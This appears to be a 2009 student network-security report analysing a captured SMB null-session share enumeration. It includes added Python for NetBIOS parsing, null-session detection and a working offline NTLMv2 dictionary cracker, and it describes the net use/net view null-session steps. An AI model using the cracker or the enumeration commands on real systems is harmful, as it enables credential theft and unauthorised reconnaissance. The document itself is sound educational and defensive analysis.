M.alzhrani Network Security P.andrew Glamorgan

8/8/2019 M.alzhrani Network Security P.andrew Glamorgan

http://slidepdf.com/reader/full/malzhrani-network-security-pandrew-glamorgan 1/21

Final mark awarded ______

UNIVERSITY OF GLAMORGAN
Assessment Cover Sheet and Feedback Form
2009/10

Module Code: SY4S02   Module Title: NETWORK SECURITY   Lecturer: PROF A BLYTH
Assignment No: 1 OF 2
No. of pages in total including this page: 3
Maximum Word Count: 2,500   Word count: 2581 words
Assignment Title: NETWORK SECURITY FULL TIME COURSE WORK 1
Tasks: see attached

Section A: Record of Submission

Record of Submission and Plagiarism Declaration

I declare that this assignment is my own work and that the sources of information and material I have used (including the internet) have been fully identified and properly acknowledged as required in the referencing guidelines provided.

Student Number: 09001603

You are required to acknowledge that you have read the above statement by writing your student number(s) above. (If this is a group assignment, please provide the student numbers of ALL group members.)

Details of Submission

Note that all work handed in after the submission date and within 5 working days will be capped at 40%. No marks will be awarded if the assignment is submitted after the late submission date unless mitigating circumstances are applied for and accepted.

- IT IS YOUR RESPONSIBILITY TO KEEP A RECORD OF ALL WORK SUBMITTED.
- An electronic copy of your work should be submitted via Blackboard.
- Work should also be submitted to the member of academic staff responsible for setting your work.
- Work not submitted to the lecturer responsible may, exceptionally, be submitted (on the submission date) to the reception of the Faculty of Advanced Technology, which is on the 2nd floor of G block (Room G221), where a receipt will be issued.

Mitigating Circumstances: if there are any exceptional circumstances which may have affected your ability to undertake or submit this assignment, make sure you contact the Faculty Advice Shop on 01443 482540 (G221).

Section B: Marking and Assessment

This assignment will be marked out of 100%.
This assignment contributes 50% of the total module marks.
This assignment is bonded / non-bonded. Details: BONDED
It is estimated that you should spend approximately 70 hours on this assignment.

Date Set: 12TH Oct 2009   Submission Date: 4TH Dec 2009   Feedback Date: 8TH Jan 2009

Learning Outcomes

This assignment addresses the following learning outcome(s) of the module:

- To demonstrate a systematic understanding of the principles of security in networks and distributed systems;
- To classify and explain the methods by which computers within a distributed system communicate;
- To evaluate critically how services are delivered to one another in a secure manner.

Marking Scheme                                                                   Marks Available   Marks Awarded
1. Introduction and outline of the problems that you have identified.            15
2. A detailed description of your proposed solution to the problems identified.  65


3.4 Logical Organisation   /5
Poor organisation of arguments ... Excellent organisation of arguments. The report is crisp, clear and well presented.
Comments:

3.5 Bibliography / References   /5
Poor use of references ... Excellent use of references.
Comments:


ASSESSMENT CRITERIA

Performance Level / Criteria: Introduction and outline of the problems; A detailed description of your solution; Conclusion; Logical Organisation

Fail (<40%)
  Introduction: No clear understanding demonstrated.
  Description: Key concepts and ideas missing.
  Conclusion: No evidence of summary and conclusions.
  Organisation: Confusing structure and no argument to the point.

Pass (40%-49%)
  Introduction: Some omissions and errors of key materials.
  Description: Some relevant factual knowledge and/or awareness of issues; a few errors may be present.
  Conclusion: Poor summary and conclusions.
  Organisation: Not well structured, enough to make the point though.

(50%-59%)
  Introduction: Key concepts introduced, with key arguments outlined.
  Description: A detailed description of the topic, showing insight. Issues are dealt with in a detailed and systematic way.
  Conclusion: Evidence of summary and conclusions linked into countermeasures.
  Organisation: Evidence of planning and thought; structured development of argumentation.

Merit (60%-69%)
  Introduction: Clear statement of the problem/issues and the argument used to address them.
  Description: An accurate and comprehensive account is given of relevant material in a way that demonstrates understanding.
  Conclusion: Clear evidence of summary and conclusions. A clear statement of countermeasures.
  Organisation: Well-planned structure and development of the argument.

Distinction (70% +)
  Introduction: An excellent statement of the problem and the proposed solution.
  Description: A systematic explanation of the topic, which demonstrates an excellent understanding of the issues.
  Conclusion: Excellent summary and conclusions. There is clear evidence of original thinking.
  Organisation: Structure that maps the development of the argument.


Contents

1. Introduction
1.1 Authentication process
2. Methodology of the analysis
3. Packets analysis
3.1 Client server interaction
  1- Client->Server Request (First Level Encoding)
  2- Server > Client response (session acknowledgement)
  3- Client > server Request (Negotiate CIFS dialect)
  4- Client < server Response (SMB_NEGOTIATE)
  5- Client > server Request (SESSION_SETUP)
  6- Client < server Response (SESSION_SETUP)
  7- Client > server Request (TRANSACTION)
  8- Client < server Response (TRANSACTION)
4. Scenario
5. Conclusion
6. Reference

Table of Figures

Table 1.2 (C McNab, 2007)
Figure 1.3 (Sanders, 2007)
Figure 2
Figure 3


M. Alzhrani 09001603, Network Security, Glamorgan University, 2009

 

1. Introduction

Technology in recent years has evolved at an amazingly fast rate to dominate almost all ways of life. The world has become a global village, where news and accidents are relayed throughout the whole world in a matter of seconds. Such intercommunication requires an intelligent transportation system; as (Comer, 2006) describes the Internet, "...the entire technology has been designed to foster communication...".

As the Internet continues to extend in a complex manner, network protocols must be addressed in order to classify communication, data transfer and systemic order. One of these protocols is the application-layer file sharing protocol SMB/CIFS, which on Windows computers is carried over NetBIOS. As (Hertel, 2003) describes, "These systems participate in NBT networks by directly handling the TCP and UDP packets". NetBIOS over TCP/IP (NBT) operates at the session layer (see table 1.1), and assigns a NetBIOS name to each particular device or service.

Typically, a client request for a share operation in the network could be a send, receive, open or read command, depending on the privileges given to the account. This command is processed by the protocol known as the Common Internet File System (CIFS), which is the later name for the Server Message Block (SMB) protocol; all of these operations are carried over TCP/IP.

It has been said that there is a fundamental design flaw which can be used to derive a considerable amount of data from a network without raising any attention: "Microsoft's software is fatally flawed from a security perspective" (Scambray & McClure, 2007). This flaw is located in Microsoft's SMB implementation, where it can be exploited by enumerating the target server's share list and acquiring vital information via the authentication process. Such a weakness is usually patched or the mechanism replaced entirely. In this report, I will analyze the packets and demonstrate the protocols that are associated with the authentication process.

(Sanders, 2007)

1.1 Authentication process

To begin with, the network sharing systems in this analysis use, firstly, NetBIOS (Network Basic Input Output System), an interface that was created to manage the network hardware and that can initiate, start, end and execute an order. NetBIOS also carries the sessions of the SMB/CIFS protocols.

Secondly, CIFS and SMB, which communicate through port 139, the port belonging to the NetBIOS session service, as shown in Table 1.2. All of these services and protocols work over TCP/IP. When CIFS needs to send a message, it is transported over a connection established with the NetBIOS session service as specified in RFC 1001 and RFC 1002 (Microsoft handbook).

Table 1.2 (C McNab, 2007)

The NetBIOS session service is the usual transport for SMB packets over TCP/IP, although there are three basic NetBIOS services, as RFC 1001 and RFC 1002 describe (name service, datagram service and session service). Our concern will be with the session service. These services are responsible for starting a connection using NetBIOS over TCP. To elaborate, at every request for network or file sharing the session service starts by acquiring names for the user/client in the local network; a name could be unique or a group name, depending on the registration mechanism: group names can be shared by more than one client, whereas a unique name is registered to only one station in the network. (Hertel, 2003)

Authentication varies with the security mode. This case study uses challenge/response authentication, and in this case an attacker who sniffs the network can capture both the server's challenge and the client's response. The response is computed from the password hash and the challenge with an algorithm that is known to both client and server (and to everybody else), so an intruder holding the pair does not decrypt anything: he tries candidate passwords offline until one reproduces the captured response, which various tools and websites automate (Hertel, 2003).

2. Methodology of the analysis

Interestingly, layered packets and command batching include more than one protocol or command in a single packet. Thus, our methodology in this analysis will follow a specific structure, in order to cover each small but important part. Each packet will be analyzed based on the priority of the information; the vital information will be documented in tables, pictures or plain text. The analyses will follow the next table in a very particular way.


(Avian Research, 1997) 

3. Packets analysis:

In our analysis, the first three packets are the full-duplex TCP connection initiated by the client (the three-way handshake), followed by the NetBIOS session request over that TCP connection, as described below:

Figure 1.3 (Sanders, 2007)

08/16-15:27:17.820587 193.63.129.192:1843 -> 193.63.129.187:139
TCP TTL:128 TOS:0x0 ID:48195 IpLen:20 DgmLen:44 DF
******S* Seq: 0xF1908361  Ack: 0x0  Win: 0x2000  TcpLen: 24
TCP Options (1) => MSS: 1460

The packet was sent at 08/16-15:27:17.820587 from 193.63.129.192 (a class C network address) through source port 1843. This host is considered to be the attacker, or the client; the packet goes straight to the domain controller, or main server, 193.63.129.187, received on port 139. (Only the first step of the handshake will be analyzed, to avoid repetition.)

Code                            Explanation
TCP TTL:128                     TCP segment; the IP time to live is 128
TOS:0x0                         The IP type of service field
ID:48195                        The IP identification field is 48195
IpLen:20                        The IP header length is 20 bytes
DgmLen:44 DF                    The datagram is 44 bytes in total; DF means "don't fragment"
******S*                        Only the SYN flag is set: the first step of the three-way handshake, synchronizing with the target IP
Ack: 0x0                        The acknowledgement number is 0 because this is the first segment
Win: 0x2000                     The receive window (buffer size) the host offers, 8192 bytes
TcpLen: 24                      The TCP header length: 20 bytes plus 4 bytes of options
TCP Options (1) => MSS: 1460    The maximum segment size the host is prepared to receive without fragmentation

The following response comes from the server with SYN/ACK, which indicates that the server received the client's SYN and is ready to set up the connection. Although the header has the same structure, the numbers change with each segment. In the first packet the sequence number (ISN, Initial Sequence Number) equals 0xF1908361, and in the next packet we can see that the Ack number is the sequence number of the next expected byte, 0xF1908362 (see figure 2).

Figure 2

Once the client acknowledges the server's SYN/ACK, the connection is established [MSDN]. The NetBIOS session service then uses the TCP connection on port 139 to carry the SMB packets: the listener receives a SESSION REQUEST over TCP and, in this case, its reply is a POSITIVE SESSION RESPONSE (RFC 1001, 1987).

1- Client->Server Request (First Level Encoding)

Figure 3


Packet 1

Description: This packet carries both the client's and the server's NetBIOS names, together with a message-type byte that states its purpose. The TCP connection must already be established in order to transport the CIFS request to the receiver, which is known as 'calling the server'. Detailed analysis of the hex (Blyth, 2009) (see Appendix A) gives:

Server service NetBIOS name: J4-ITRL-14
Client/workstation NetBIOS name: J4-ITRL-19

The first four bytes, 81 00 00 44, are the NBT header: type 0x81 is SESSION REQUEST, and 0x0044 (68) is the length of the payload that follows. This shows that the client wants a session with the receiver in order to reach its shares. Finally, the server's IP address must be known to perform the connection successfully, as we will see in the response packet (RFC 1002, 1987).
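The first-level encoding that Appendix A decodes by hand, as an added example (not code from the report): it implements the RFC 1001 nibble-plus-'A' encoding in both directions and parses an NBT SESSION REQUEST, using the hex dump printed in Appendix A as input. The 16th byte of each decoded name is the service suffix (0x20 server service, 0x00 workstation), which is why the called name ends in a 0x20 and the calling name in 0x00. Function names are this example's own; the packet bytes are the page's.

```python
"""NetBIOS first-level name encoding (RFC 1001) and an NBT SESSION REQUEST
parser, run against the Packet 1 hex dump reproduced in Appendix A."""
from __future__ import annotations
import struct

# Packet 1 exactly as printed in Appendix A: 4-byte NBT header + 68-byte payload.
PACKET1 = bytes.fromhex(
    "81 00 00 44 20 45 4B 44 45 43 4E 45 4A 46 45 46"
    " 43 45 4D 43 4E 44 42 44 45 43 41 43 41 43 41 43"
    " 41 43 41 43 41 00 20 45 4B 44 45 43 4E 45 4A 46"
    " 45 46 43 45 4D 43 4E 44 42 44 4A 43 41 43 41 43"
    " 41 43 41 43 41 41 41 00"
)

NBT_SESSION_REQUEST = 0x81
NBT_POSITIVE_SESSION_RESPONSE = 0x82


def encode_netbios_name(name: str, suffix: int) -> bytes:
    """Pad NAME with spaces to 15 bytes, append the service SUFFIX byte, then
    split every byte into two nibbles and add 0x41 ('A') to each: 16 -> 32."""
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    if len(raw) != 16:
        raise ValueError("NetBIOS names are at most 15 characters")
    out = bytearray()
    for b in raw:
        out.append(0x41 + (b >> 4))
        out.append(0x41 + (b & 0x0F))
    return bytes(out)


def decode_netbios_name(encoded: bytes) -> tuple[str, int]:
    """Inverse of encode_netbios_name; returns (name, service suffix)."""
    if len(encoded) != 32 or any(not 0x41 <= c <= 0x50 for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((encoded[i] - 0x41) << 4) | (encoded[i + 1] - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].rstrip(b" ").decode("ascii"), raw[15]


def _read_name(buf: bytes, pos: int) -> tuple[bytes, int]:
    """Read one DNS-style label sequence: length byte, label, ..., 0x00."""
    labels = []
    while True:
        length = buf[pos]
        pos += 1
        if length == 0:
            return b".".join(labels), pos
        labels.append(buf[pos:pos + length])
        pos += length


def parse_session_request(pkt: bytes) -> dict:
    """NBT SESSION REQUEST: type, flags (bit 0 extends the length to 17 bits),
    16-bit length, then the CALLED and CALLING encoded names."""
    msg_type, flags, length = struct.unpack(">BBH", pkt[:4])
    length |= (flags & 0x01) << 16
    if msg_type != NBT_SESSION_REQUEST:
        raise ValueError(f"unexpected NBT message type 0x{msg_type:02x}")
    body = pkt[4:4 + length]
    if len(body) != length:
        raise ValueError("truncated NBT message")
    called, pos = _read_name(body, 0)
    calling, _ = _read_name(body, pos)
    # The first label is the 32-letter name; NetBIOS scope labels, if any, follow.
    called_name, called_suffix = decode_netbios_name(called.split(b".")[0])
    calling_name, calling_suffix = decode_netbios_name(calling.split(b".")[0])
    return {"length": length,
            "called": called_name, "called_suffix": called_suffix,
            "calling": calling_name, "calling_suffix": calling_suffix}


if __name__ == "__main__":
    print(parse_session_request(PACKET1))
    print(encode_netbios_name("J4-ITRL-14", 0x20).decode())
```

Decoding with the suffix kept separate is what makes the distinction visible that the hand decode in Appendix A blurs: the same host name registers once per service, and a session request names the server service (<20>) of the target, not its workstation name.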

2- Server > Client response (session acknowledgement)

Packet 2: 0x82

Description: The first byte, 0x82, indicates, according to figure 3, that this packet is a POSITIVE SESSION RESPONSE: the session between server and client has been set up successfully (Blyth, 2009).

3- Client > server Request (Negotiate CIFS dialect)

Packet 3: SMB_COM_NEGOTIATE

4- Client < server Response (SMB_NEGOTIATE)

Description: In this packet a dialect has been chosen by the server, and this, along with an 8-byte key, is returned to the client in order to establish the user's identity in the next packet.

Challenge key is: 0x103F5ED8E2243A26

This is an 8-byte challenge from the server to the client. The client combines the challenge with its password hash to compute the response it sends back to the server (S Harris et al, 2007).
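The offline attack described in section 1.1 (an attacker who has sniffed the challenge and the response recovers the password) and the 8-byte challenge from this packet, as an added example that is not part of the report. It uses the NTLMv2 construction (HMAC-MD5 over the server challenge and the client blob, keyed with NTOWFv2) rather than the DES-based LM/NTLMv1 responses of the NT 4.0 era, so it goes beyond the page's specific case, but the attacker's procedure is identical: nothing is decrypted, each candidate password is run through the public algorithm and compared with the captured response. The server challenge is the value quoted above; the user name, domain, client blob, word list and the "captured" response (generated here from a password the attacker is not supposed to know) are assumptions made for this example. MD4 is implemented inline because many OpenSSL builds no longer expose it to hashlib.

```python
"""Offline recovery of a password from a sniffed NTLM challenge/response."""
import hashlib
import hmac
import struct


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4; the NT hash is MD4 over the UTF-16LE password."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    bit_len = len(msg) * 8
    msg += b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                   # round 1
            a, d, c, b = d, c, b, _rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a, d, c, b = d, c, b, _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, d, c, b = d, c, b, _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
        a0, b0, c0, d0 = ((a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF,
                          (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(upper(user) + domain))."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def ntlmv2_proof(ntowf: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || client blob)."""
    return hmac.new(ntowf, server_challenge + blob, hashlib.md5).digest()


def recover_password(user, domain, server_challenge, blob, captured_proof, candidates):
    """Dictionary attack: recompute the proof for each candidate and compare it
    with the sniffed one. Only the challenge and the response are needed."""
    for cand in candidates:
        proof = ntlmv2_proof(ntowf_v2(cand, user, domain), server_challenge, blob)
        if hmac.compare_digest(proof, captured_proof):
            return cand
    return None


# Constructed capture (assumptions for this example, except the challenge,
# which is the one quoted in the report for packet 4).
SERVER_CHALLENGE = bytes.fromhex("103F5ED8E2243A26")
USER, DOMAIN = "jsmith", "ITRL"
# Simplified NTLMv2 blob: RespType/HiRespType, reserved, timestamp, client nonce, reserved.
CLIENT_BLOB = bytes.fromhex("0101000000000000") + bytes(8) + bytes.fromhex("a1b2c3d4e5f60718") + bytes(4)
_SECRET = "Winter2009!"   # what the attacker does not know
CAPTURED_PROOF = ntlmv2_proof(ntowf_v2(_SECRET, USER, DOMAIN), SERVER_CHALLENGE, CLIENT_BLOB)
WORDLIST = ["password", "letmein", "Glamorgan", "Winter2009!", "admin123"]

if __name__ == "__main__":
    print("NT hash of 'password':", nt_hash("password").hex())
    print("recovered:", recover_password(USER, DOMAIN, SERVER_CHALLENGE, CLIENT_BLOB, CAPTURED_PROOF, WORDLIST))
```

The cost of the attack is one MD4 plus two HMAC-MD5 per candidate, which is why a captured challenge/response pair is worth as much to an attacker as the hash itself, and why the report's recommendation to restrict what can be obtained without credentials matters.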

5- Client > server Request (SESSION_SETUP)

Packet 5: SMB_COM_SESSION_SETUP_ANDX

Description:

An important feature of this packet and the following ones is command batching (the AndX chain): a technique that reduces network traffic by carrying several SMB commands in one packet. In this packet the client must send a user name and a password to gain access; we can verify this by the UID field in the server's reply: if the reply carries a UID, then this request carried the password fields, even if their length appears as zero (Microsoft handbook).


At this stage the response to the previous challenge should be present; instead, no password or challenge response was sent in this packet. The password, user and domain are set to null, which is what Microsoft describes as a null session. A fundamental flaw allows an anonymous user to issue a command and receive a reply. An anonymous user could, for example, enumerate the share list, as this is a Windows NT feature, "Also known as NULL session connections" (Microsoft support).

Also, an interesting bit has been set in the client capabilities, smb.server_cap.level_2_oplocks; this advertises support for Level II opportunistic locks, a file-caching feature (Novell, 2006), and does not by itself say anything about the privileges the session will be granted. The account name shown as Anonymous indicates that the server treats it as a legitimate logon. The server resource share path is \\J4-ITRL-14\IPC$, of service type IPC, and it is reached through the batched tree connect command; this command is needed because it gives access to a named pipe or a file system (CIFS/1.0, 1997).
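The null session described above, as an added detection example that is not code from the report: it builds two SESSION_SETUP_ANDX requests in the NT LM 0.12 non-extended-security layout (one with empty account, domain and password, one with credentials), wraps them in NBT session messages and parses them back to decide whether the client is setting up a null session. The account and domain names, the NativeOS/NativeLanMan strings and the 24-byte response placeholder are assumptions; the field layout (WordCount 13, OEM and Unicode password lengths, Capabilities with the Level II oplocks bit) is the protocol's. It only handles OEM (non-Unicode) strings, which is the form the report's NT 4.0 trace shows.

```python
"""Parse an SMB1 SESSION_SETUP_ANDX request and flag null sessions."""
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_NONE = 0xFF                  # AndXCommand: no further batched command
CAP_LEVEL_II_OPLOCKS = 0x00000080    # the capability bit discussed in the report
FLAGS2_UNICODE = 0x8000


def nbt_session_message(smb: bytes) -> bytes:
    """NBT session message: type 0x00 followed by a 3-byte big-endian length."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def smb_header(command: int, uid: int = 0, mid: int = 1) -> bytes:
    """32-byte SMB1 header; Flags2 without the UNICODE bit, so strings are OEM."""
    return SMB_MAGIC + struct.pack("<BIBHH8sHHHHH",
                                   command, 0, 0x18, 0x0001, 0, bytes(8),
                                   0, 0, 0x1234, uid, mid)


def build_session_setup(account: str, domain: str, oem_password: bytes) -> bytes:
    """Client -> server SESSION_SETUP_ANDX (WordCount 13). A null session sends an
    empty account and domain and a zero-length (or single NUL) password."""
    words = struct.pack("<BBHHHHIHHII",
                        SMB_COM_NONE, 0, 0,        # AndXCommand, AndXReserved, AndXOffset
                        0xFFFF, 2, 0,              # MaxBufferSize, MaxMpxCount, VcNumber
                        0,                         # SessionKey
                        len(oem_password), 0,      # OEMPasswordLen, UnicodePasswordLen
                        0, CAP_LEVEL_II_OPLOCKS)   # Reserved, Capabilities
    data = (oem_password + account.encode() + b"\0" + domain.encode() + b"\0"
            + b"Windows NT 4.0\0" + b"NT LAN Manager 4.0\0")    # assumed strings
    return nbt_session_message(smb_header(SMB_COM_SESSION_SETUP_ANDX) + bytes([13])
                               + words + struct.pack("<H", len(data)) + data)


def parse_session_setup(frame: bytes) -> dict:
    """Extract the credential fields and decide whether this is a null session."""
    if frame[0] != 0x00:
        raise ValueError("not an NBT session message")
    smb = frame[4:4 + int.from_bytes(frame[1:4], "big")]
    if smb[:4] != SMB_MAGIC or smb[4] != SMB_COM_SESSION_SETUP_ANDX:
        raise ValueError("not an SMB1 SESSION_SETUP_ANDX request")
    flags2 = struct.unpack_from("<H", smb, 10)[0]
    uid = struct.unpack_from("<H", smb, 28)[0]
    if flags2 & FLAGS2_UNICODE:
        raise ValueError("Unicode strings are not handled by this example")
    if smb[32] != 13:
        raise ValueError("unexpected WordCount (extended security form?)")
    (_, _, _, _, _, _, _, oem_len, uni_len, _, caps) = struct.unpack_from("<BBHHHHIHHII", smb, 33)
    byte_count = struct.unpack_from("<H", smb, 59)[0]
    data = smb[61:61 + byte_count]
    oem_pw, uni_pw = data[:oem_len], data[oem_len:oem_len + uni_len]
    account, domain, native_os, native_lm = data[oem_len + uni_len:].split(b"\0")[:4]
    # Windows clients send a single NUL as the "password" of a null session,
    # which is the zero-looking password the report refers to.
    null_session = oem_pw.strip(b"\0") == b"" and uni_pw == b"" and account == b""
    return {"uid": uid, "account": account.decode(), "domain": domain.decode(),
            "native_os": native_os.decode(), "native_lanman": native_lm.decode(),
            "capabilities": caps, "null_session": null_session}


NULL_SESSION_FRAME = build_session_setup("", "", b"\0")                    # constructed
AUTH_FRAME = build_session_setup("jsmith", "ITRL", bytes(range(1, 25)))    # constructed

if __name__ == "__main__":
    for frame in (NULL_SESSION_FRAME, AUTH_FRAME):
        print(parse_session_setup(frame))
```

Run against a capture, the same parser gives a detection rule: a SESSION_SETUP_ANDX request with empty account and password followed by a TREE_CONNECT_ANDX to IPC$ is exactly the sequence this report's scenario describes.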

6- Client < server Response (SESSION_SETUP)

Packet 6: SMB_COM_SESSION_SETUP_ANDX

Description: No errors were found at this stage, although an error would arise if a required password were missing; in this case the password is not required. Instead, a 16-bit UID is assigned in this response and is carried in every following packet to identify the authenticated user. The native OS, LAN manager type and domain are revealed in the packet, as shown in the analysis, and the IPC share is available on the server to start the sharing process (CodeFX, 2001).

In addition, a batched command also appears with the value 0x75 [TREE_CONNECT_ANDX], whereas "A tree connect is performed to access any resource, be it a filesystem, a printer, or a named pipe." (Ithron, 2000).

7- Client > server Request (TRANSACTION)

Packet 7: SMB_COM_TRANSACTION 0x25

Description: The client request is a Remote Administration Protocol (RAP) call (opcode 0x0068). The command is sent to the server through the \PIPE\LANMAN named pipe, where an API call (the LAN Manager remote API that predates RPC) is carried in the SMB TRANSACTION (0x25) command (Ithron, 2000). According to the packet the RAP request is NetServerEnum2, which asks the server to list the available servers or to browse the list; the transaction uses the "WrLehDO" parameter descriptor, another field in the packet, and the last 4 bytes of the packet are the server types requested (Microsoft handbook).


8- Client < server Response (TRANSACTION)

Packet 8: SMB_COM_TRANSACTION 0x25

Description: The server's response contains the list of the available servers on the network; it is fairly obvious that the answer to the whole process is in this packet, where we can find the list of shares, as explained in the analysis table.

4. Scenario:

J4-ITRL-19 started a TCP/IP connection to port 139; this is shown in the three-way handshake. The second action is a NetBIOS session request, followed by an SMB session setup with null credentials and a tree connect to the hidden share path \\J4-ITRL-14\IPC$ on the local main server. The TREE_CONNECT_ANDX gives it the ability to connect through. A transfer channel is then opened through \PIPE\LANMAN, where an API call enumerates the server's list of shares.

o NBT Session Client Request
o SMB Negotiate Protocol Request
o SMB Session Setup Request
o SMB Tree Connect (to \\J4-ITRL-14\IPC$)
o RAP call
o RAP response (share/browse list)


5. Conclusion:

Many types of evidence have been revealed during the analysis. The most notable are the null session logon, the IPC$ tree connect and, more interestingly, the \PIPE\LANMAN transaction, which shows that a lot more detail would give clues to the action committed. All of the previous evidence, and the scenario, are meaningless without the last packet, where the purpose of this dump is exposed. Thus, from the final data, I strongly believe it is an exploitation of a fundamental flaw in a Microsoft Windows NT 4.0 box on a local network, where an anonymous user can obtain the network share list or view the browse list, and can enumerate the domain controller.

Since Microsoft considers the null session process of obtaining the list of shares a normal function, justified by the need of the domain controller to identify the active users, it is rational that some would claim it was carried out with hacking intentions. Intention, however, is another concern I am unable to examine in detail; as far as we know it is a legal operation, carried out in user-level security mode, which does not require any password, with an anonymous account, to gain access to the list of shares on the master server. Hackers, however, could employ tools and take advantage of the null session process. They would be likely to obtain a variety of information about a network, as revealed previously in this analysis, using the net use and net view commands (Xfocus, 2001); it is ridiculously easy to launch the null session attack: a net use to \\server\IPC$ with an empty user name and an empty password, followed by net view against the same server.

In conclusion, a series of indicators shows that the previous packets are an information gathering operation, and that the targeted network has been exploited through a major weakness in the Windows NTLM authentication process. "And, of course, there has been a lot of work on fundamentals-patching code-level vulnerabilities on a regular basis" (Scambray & McClure, 2007). Therefore, there is more than one solution to the specified weakness: restricting null (anonymous) access could be beneficial, but not entirely, where remote access remains exploitable; closing port 139 could be effective, but not in a file-sharing environment. Microsoft addressed this issue with the RestrictAnonymous setting described in its knowledge base article (Microsoft support), and the newer releases restrict anonymous access by default. Moreover, I would recommend upgrading the box to the latest patched version of Windows, in parallel with configuring the firewall with appropriate rules, in order to deter a potential enumeration process.


Reference:

Andrew Blyth, 2009, "The Common Internet File System (CIFS) and the Server Message Block (SMB)", lecture notes distributed in the topic SY4S02 Network Security, Glamorgan University, Pontypridd, on 12 Oct 2009.

Avian Research, January 1997, CIFS: Common Insecurities Fail Scrutiny.

CIFS DRAFT 1, Mar 1997, A Common Internet File System (CIFS/1.0) Protocol, available: http://www.microsoft.com/about/legal/protocols/BSTD/CIFS/draft-leach-cifs-v1-spec-02.txt, last accessed 21st of Oct.

CodeFX, 2001, CIFS Explained, available: http://www.codefx.com/CIFS_Explained.htm, last accessed 19th Oct 2009.

Christopher Hertel, Aug 11 2003, Implementing CIFS: The Common Internet File System, Prentice Hall, 672 pages.

C McNab, 2007, Network Security Assessment: Know Your Network, second edition, O'Reilly.

Chris Sanders, May 2007, Practical Packet Analysis: Using Wireshark to Solve Real-World Network Problems.

Douglas E. Comer, 1995, Internetworking with TCP/IP, Vol 1: Principles, Protocols, and Architecture, Prentice Hall Inc.

Ithron, 2000, Everything Developer, available: http://everything2.com/title/CIFS%253A+Common+Insecurities+Fail+Scrutiny+%25283%2529, last accessed 23rd Oct 2009.

IBM Corporation, Port 139 NetBIOS, available: http://www.iss.net/security_center/advice/Exploits/Ports/139/default.htm, last accessed 18th of Oct.

J Scambray & S McClure, Dec 2007, Hacking Exposed Windows: Windows Security Secrets & Solutions, 3rd edition, McGraw-Hill.

Microsoft Corporation, Microsoft Networks SMB File Sharing Protocol, Document Version 6.0p, Jan 1996, available: http://www.samba.org/samba/ftp/specs/smbpub.txt, last accessed 23rd of Oct.

Microsoft handbook, MSDN Common Internet File System (CIFS) File Access Protocol, available: http://www.microsoft.com/downloads/details.aspx?FamilyID=c4adb584-7ff0-4acf-bd91-5f7708adb23c, last accessed 20th Oct 2009.


Microsoft support, March 2007, Restricting information available to anonymous logon users, available: http://support.microsoft.com/?scid=kb%3Ben-us%3B143474&x=7&y=10, last accessed 26th Oct 2009.

Novell, Mar 2006, OpLocks on NetWare, available: http://wiki.novell.com/index.php/OpLocks_on_NetWare, last accessed 26th Oct 2009.

NetBIOS Working Group, March 1987, Request for Comments: 1001 [RFC], available: http://ubiqx.org/cifs/rfc-draft/rfc1001.html, last accessed 25th of Oct.

Network Working Group, Mar 1987, RFC 1002 - Protocol standard for a NetBIOS service on a TCP/UDP transport, available: http://www.faqs.org/rfcs/rfc1002.html, last accessed 27th Oct 2009.

S Harris, A Harper, C Eagle, J Ness, 2007, Gray Hat Hacking: The Ethical Hacker's Handbook, 2nd edition, McGraw-Hill.

Xfocus, 2001, Atlanta, Georgia, available: http://www.xfocus.net/articles/200305/smbrelay.html, last accessed 24th of Oct.

APPENDIX A

Packet 1 (NBT SESSION REQUEST), hex dump:

81 00 00 44 20 45 4B 44 45 43 4E 45 4A 46 45 46   ...D EKDECNEJFEF
43 45 4D 43 4E 44 42 44 45 43 41 43 41 43 41 43   CEMCNDBDECACACAC
41 43 41 43 41 00 20 45 4B 44 45 43 4E 45 4A 46   ACACA. EKDECNEJF
45 46 43 45 4D 43 4E 44 42 44 4A 43 41 43 41 43   EFCEMCNDBDJCACAC
41 43 41 43 41 41 41 00                           ACACAAA.

Bytes 0-3 are the NBT header (type 0x81 SESSION REQUEST, length 0x0044 = 68). Each name then follows as a length byte 0x20 (32), the 32 encoded letters and a terminating 0x00.

EKDECNEJFEFCEMCNDBDECACACACACACA  EKDECNEJFEFCEMCNDBDJCACACACACAAA = 32 letters + 32 letters

First-level encoding (RFC 1001): each byte of the 16-byte NetBIOS name (15 characters padded with spaces, plus one service suffix byte) is split into two nibbles and 0x41 ('A') is added to each, so a letter pair decodes as ((first - 0x41) << 4) | (second - 0x41).

Called name: J4-ITRL-14 (server service)
